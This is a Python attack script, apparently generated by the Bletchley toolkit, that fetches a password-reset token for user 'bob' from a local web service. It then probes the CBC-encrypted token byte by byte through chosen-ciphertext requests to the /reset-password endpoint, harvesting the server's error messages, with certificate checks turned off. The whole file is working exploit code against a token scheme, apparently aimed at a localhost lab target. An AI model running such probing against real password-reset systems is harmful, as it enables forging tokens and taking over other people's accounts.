[135] | 1 | #!/usr/bin/env python3 |
---|
| 2 | |
---|
| 3 | import sys |
---|
| 4 | from bletchley import blobtools,buffertools |
---|
| 5 | from bletchley import chosenct |
---|
| 6 | from bletchley.CBC import * |
---|
| 7 | |
---|
| 8 | host = '127.0.0.1' |
---|
| 9 | port = 8888 |
---|
| 10 | protocol = 'http' |
---|
| 11 | |
---|
| 12 | |
---|
| 13 | def fetchFreshToken(): |
---|
| 14 | gen_url = '%s://%s:%d/generate-reset-token?user=bob' % (protocol,host,port) |
---|
| 15 | response = requests.get(gen_url) |
---|
| 16 | return response.content.split(b'token=',1)[1].split(b'"')[0] |
---|
| 17 | |
---|
| 18 | |
---|
| 19 | def decode(token): |
---|
| 20 | return blobtools.decodeChain(['percent/upper','base64/rfc3548'], token) |
---|
| 21 | |
---|
| 22 | |
---|
| 23 | def encode(binary): |
---|
| 24 | return blobtools.encodeChain(['base64/rfc3548','percent/upper'], binary) |
---|
| 25 | |
---|
| 26 | |
---|
| 27 | try: |
---|
| 28 | import requests |
---|
| 29 | import urllib3 |
---|
| 30 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
---|
| 31 | except: |
---|
| 32 | sys.stderr.write('ERROR: Could not import requests module. Ensure it is installed.\n') |
---|
| 33 | sys.stderr.write(' Under Debian, the package name is "python3-requests"\n.') |
---|
| 34 | sys.stderr.write(' Alternatively, re-generate this script using the --native option.\n.') |
---|
| 35 | sys.exit(1) |
---|
| 36 | |
---|
| 37 | |
---|
| 38 | session = requests.Session() |
---|
| 39 | def sendRequest(session, data=None): |
---|
| 40 | data = data.decode('utf-8') |
---|
| 41 | method = 'GET' |
---|
| 42 | path = '/reset-password?token='+data |
---|
| 43 | url = "%s://%s:%d%s" % (protocol,host,port,path) |
---|
| 44 | body = (b'') |
---|
| 45 | |
---|
| 46 | # Set verify=True if you want to validate the server cert |
---|
| 47 | return session.request(method, url, headers={}, data=body, allow_redirects=False, verify=False) |
---|
| 48 | |
---|
| 49 | |
---|
| 50 | def processResponse(data, other=None): |
---|
| 51 | global session |
---|
| 52 | response = sendRequest(session, encode(data)) |
---|
| 53 | |
---|
| 54 | if b'ERROR: <b>' in response.content: |
---|
| 55 | return response.content.split(b'ERROR: <b>')[1].split(b'</b>')[0] |
---|
| 56 | else: |
---|
| 57 | return 'success' |
---|
| 58 | |
---|
| 59 | |
---|
| 60 | token = fetchFreshToken() |
---|
| 61 | print('Fetched new password reset token for bob: ' + token.decode('utf-8'),file=sys.stderr) |
---|
| 62 | ciphertext = decode(token) |
---|
| 63 | #print(processResponse(ciphertext), file=sys.stderr) |
---|
| 64 | |
---|
| 65 | # Byte-by-byte probing of ciphertext |
---|
| 66 | result = chosenct.probe_bytes(processResponse, ciphertext, list(range(1,256)), max_threads=8) |
---|
| 67 | print(result.toHTML()) |
---|